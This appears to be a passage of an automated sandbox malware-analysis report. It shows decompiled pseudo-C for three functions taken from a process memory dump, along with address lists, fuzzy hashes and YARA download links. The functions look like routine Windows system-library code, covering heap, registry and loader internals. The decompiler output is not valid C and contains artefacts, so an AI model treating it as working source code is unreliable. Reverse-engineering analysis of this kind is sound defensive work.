0x053a8602
0x053a8606
0x053a860a
0x053a860b
0x053a860e
0x053a8611
0x00000000
0x053a8611
0x053a85f3
0x00000000
0x053a85f3
0x053a8619
0x053a861e
0x053a861e
0x053a8621
0x053a8622
0x053a8623
0x053a8625
0x053a862c
0x00000000
0x053a873d
0x00000000
0x053a873d
0x053a8737
0x053a850f
0x053a8512
0x00000000
0x053a8512
0x00000000
0x053a84d6

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa20075ac70967a421f8dc5bf8cdc4c0e73506b71d305499acb1f7cc0610717d
Instruction ID: 6fc529a0c4302b3134b60f195236659315642489948601f5d9e7e8e81a1595ac
Opcode Fuzzy Hash: fa20075ac70967a421f8dc5bf8cdc4c0e73506b71d305499acb1f7cc0610717d
Instruction Fuzzy Hash: 34B18B72E04209DFDB19DFA8C984AADFBBAFF88304F14412AE505AB655DB70AC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 053C513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E053C513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x548d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E053DD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E053B2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L053B4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E053DF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E053AFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x548b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E053DB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x053c5142
0x053c514c
0x053c5150
0x053c5157
0x053c5159
0x053c515e
0x053c5165
0x053c5169
0x053c516c
0x053c5172
0x053c5176
0x053c517a
0x053c517a
0x053c517a
0x053c517f
0x05406d8b
0x05406d8e
0x05406d91
0x05406d95
0x05406d98
0x05406d9c
0x05406da0
0x05406da3
0x05406da7
0x05406e26
0x05406e26
0x05406e2a
0x053c51f9
0x053c51f9
0x053c51fe
0x05406e33
0x05406e33
0x05406e39
0x05406e3d
0x05406e46
0x05406e50
0x00000000
0x00000000
0x05406e52
0x05406e53
0x05406e56
0x05406e5d
0x00000000
0x00000000
0x00000000
0x05406e5f
0x05406e67
0x05406e77
0x05406e7f
0x05406e80
0x05406e88
0x05406e90
0x05406e9f
0x05406ea5
0x05406ea9
0x05406eb1
0x05406ebf
0x00000000
0x00000000
0x05406ecf
0x05406ed3
0x00000000
0x00000000
0x05406edb
0x05406ede
0x05406ee1
0x05406ee8
0x05406eeb
0x05406eed
0x05406ef0
0x05406ef4
0x05406ef8
0x05406efc
0x00000000
0x00000000
0x05406f0d
0x05406f11
0x05406f32
0x05406f37
0x05406f3b
0x05406f3e
0x05406f41
0x05406f46
0x00000000
0x00000000
0x05406f4c
0x05406f50
0x05406f50
0x05406f54
0x05406f62
0x05406f65
0x05406f6d
0x05406f7b
0x05406f7b
0x05406f93
0x05406f98
0x05406fa0
0x05406fa6
0x05406fb3
0x05406fb6
0x05406fbf
0x05406fc1
0x05406fd5
0x05406fda
0x05406fda
0x05406fdd
0x05406fe2
0x05406fe7
0x05406feb
0x05406fef
0x05406ff3
0x053c520c
0x053c520c
0x053c520f
0x053c5215
0x053c5234
0x053c523a
0x053c523a
0x053c5244
0x053c5245
0x053c5246
0x053c5251
0x053c5251
0x05406f13
0x05406f17
0x05406f17
0x05406f18
0x05406f1b
0x05406f1f
0x05406f23
0x00000000
0x05406f28
0x053c5204
0x053c5204
0x053c5208
0x00000000
0x053c5208
0x053c5185
0x053c5188
0x053c518a
0x053c518e
0x053c5195
0x05406db1
0x05406db5
0x05406db9
0x053c519b
0x053c519b
0x053c519e
0x053c51a7
0x053c51a9
0x053c51a9
0x053c51b5
0x053c51b8
0x053c51bb
0x053c51be
0x053c51c1
0x053c51c5
0x053c51c9
0x053c51cd
0x053c51cd
0x053c51d8
0x053c51dc
0x053c51e0
0x05406dcc
0x05406dd0
0x05406dd5
0x05406ddd
0x05406de1
0x05406de1
0x05406de5
0x05406deb
0x05406df1
0x05406df7
0x05406dfd
0x05406e01
0x05406e05
0x05406e09
0x05406e0d
0x05406e11
0x05406e11
0x053c51eb
0x05406e1a
0x05406e1f
0x05406e21
0x05406e23
0x00000000
0x053c51f1
0x053c51f1
0x00000000
0x053c51f1

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92ae4e9c6c92c90fe10c41c2bf222bbef1c926fb09e1af8c7ddf45c51e094e1a
Instruction ID: 687f9a6e036ded840952f30c35db5f31b8d2f680e34a3c0a05decb29c4b43425
Opcode Fuzzy Hash: 92ae4e9c6c92c90fe10c41c2bf222bbef1c926fb09e1af8c7ddf45c51e094e1a
Instruction Fuzzy Hash: 8AC115756093818FD354CF28C580A5AFBF1BF88304F1449AEF99A8B392D771E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 053C03E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E053C03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x548d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E053C0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E053DB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E053AB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x5487c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E053B7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E053B7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E05417016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E053D9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E054169A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x5487c04 != 0) {
						_t118 = _v12;
						_t120 = E0541A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x5487bd8;
						if( *0x5487bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E053D95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E053D99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E05413540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0539B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E053DAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x5488474 - 3;
										if( *0x5488474 != 3) {
											 *0x54879dc =  *0x54879dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E053B7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E053B7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E05417016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x5488708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x5487b00; // 0x0
							asm("ror esi, cl");
							 *0x548b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E053D95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E053A7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x053c03f1
0x053c03f7
0x053c03f9
0x053c03fb
0x053c03fd
0x053c0400
0x053c040a
0x05404c7a
0x053c0537
0x053c0547
0x053c0410
0x053c0410
0x053c0414
0x053c0417
0x053c041a
0x053c0421
0x053c0424
0x053c042b
0x053c043b
0x053c043e
0x053c043f
0x053c043f
0x053c0446
0x053c0449
0x053c044c
0x053c044f
0x053c0459
0x05404c8d
0x053c045f
0x053c045f
0x053c045f
0x053c0467
0x05404c97
0x05404c9d
0x05404ca4
0x05404caa
0x05404caf
0x05404cb1
0x05404cc3
0x05404cb3
0x05404cbc
0x05404cbc
0x05404cc8
0x05404ccb
0x05404cd7
0x05404cda
0x05404cdf
0x05404cdf
0x05404ccb
0x05404ca4
0x053c046d
0x053c046f
0x053c046f
0x053c0471
0x053c0476
0x053c047a
0x053c047b
0x053c0483
0x053c0489
0x053c048d
0x00000000
0x00000000
0x05404ce9
0x05404cef
0x05404d22
0x05404d22
0x00000000
0x05404d22
0x05404cf1
0x05404cf7
0x00000000
0x00000000
0x05404cf9
0x05404cff
0x00000000
0x00000000
0x05404d05
0x05404d07
0x00000000
0x00000000
0x05404d0d
0x05404d0f
0x05404d14
0x05404d16
0x00000000
0x00000000
0x05404d1c
0x05404d1c
0x053c0499
0x053c0535
0x053c0535
0x00000000
0x053c0535
0x053c04a6
0x05404d2c
0x05404d37
0x05404d39
0x05404d3b
0x00000000
0x00000000
0x05404d41
0x05404d48
0x053c0527
0x053c052b
0x053c052d
0x053c0530
0x053c0530
0x00000000
0x053c052b
0x05404d4e
0x053c04ac
0x053c04ac
0x053c04af
0x053c04b2
0x053c04b7
0x053c04b9
0x053c04bb
0x053c04bd
0x053c04bf
0x053c04c5
0x053c04c9
0x05404d53
0x05404d59
0x05404db9
0x05404dba
0x05404dbf
0x05404dc2
0x05404dc4
0x05404dc7
0x05404dce
0x00000000
0x05404dce
0x05404d5b
0x05404d61
0x00000000
0x00000000
0x05404d63
0x05404d69
0x00000000
0x00000000
0x05404d6b
0x05404d6e
0x05404d74
0x05404d76
0x05404d7c
0x05404d7e
0x05404d84
0x05404d89
0x05404d8c
0x05404d8d
0x05404d92
0x05404d95
0x05404d96
0x05404d98
0x05404d9a
0x05404d9f
0x05404da4
0x05404da6
0x05404da8
0x05404daf
0x05404db1
0x05404db1
0x05404daf
0x05404da6
0x05404d84
0x05404d7c
0x00000000
0x05404d74
0x053c04d6
0x05404de1
0x053c04dc
0x053c04dc
0x053c04dc
0x053c04e4
0x05404deb
0x05404df1
0x05404df8
0x05404dfe
0x05404e03
0x05404e05
0x05404e17
0x05404e07
0x05404e10
0x05404e10
0x05404e1c
0x05404e1f
0x05404e35
0x05404e35
0x05404e1f
0x05404df8
0x053c04f1
0x053c04fa
0x05404e3f
0x05404e47
0x05404e5b
0x05404e61
0x05404e67
0x05404e69
0x05404e71
0x05404e73
0x053c0500
0x053c0500
0x053c0500
0x053c04fa
0x053c0508
0x053c051d
0x053c051d
0x053c051f
0x053c0524
0x00000000
0x053c0524
0x053c0515
0x053c0517
0x05404e7a
0x05404e7c
0x00000000
0x00000000
0x05404e85
0x00000000
0x05404e85
0x00000000
0x053c0517

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9afc9b729cd6fbe32bd66800317f253f1b26c75dbe300def46ede82a12e000b9
Instruction ID: a44904ef3f36afbb0a65bad1d3f8930202665e5809459f33a856aa802bfaefc5
Opcode Fuzzy Hash: 9afc9b729cd6fbe32bd66800317f253f1b26c75dbe300def46ede82a12e000b9
Instruction Fuzzy Hash: A791E531E08254DBEF259B68C858BFE7BA6FF01764F1502EAEA11A72D0D7749D00C791

Uniqueness

Uniqueness Score: -1.00%

Function 0539C600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0539C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x548d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E053A6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E053DB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x5487b9c; // 0x0
					_t74 = L053B4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E053D9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L053B77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E053DF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E053D13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L053B77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E053D9650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x0539c608
0x0539c615
0x0539c625
0x0539c62d
0x0539c635
0x0539c640
0x0539c680
0x0539c687
0x0539c688
0x0539c689
0x0539c694
0x0539c694
0x0539c642
0x0539c64a
0x0539c697
0x05407a25
0x05407a2b
0x05407a2e
0x05407a30
0x05407bea
0x05407bea
0x00000000
0x05407bea
0x05407a36
0x05407a43
0x05407a48
0x05407a4c
0x05407a4e
0x00000000
0x00000000
0x05407a58
0x05407a5a
0x05407a5b
0x05407a5c
0x05407a5d
0x05407a63
0x05407a64
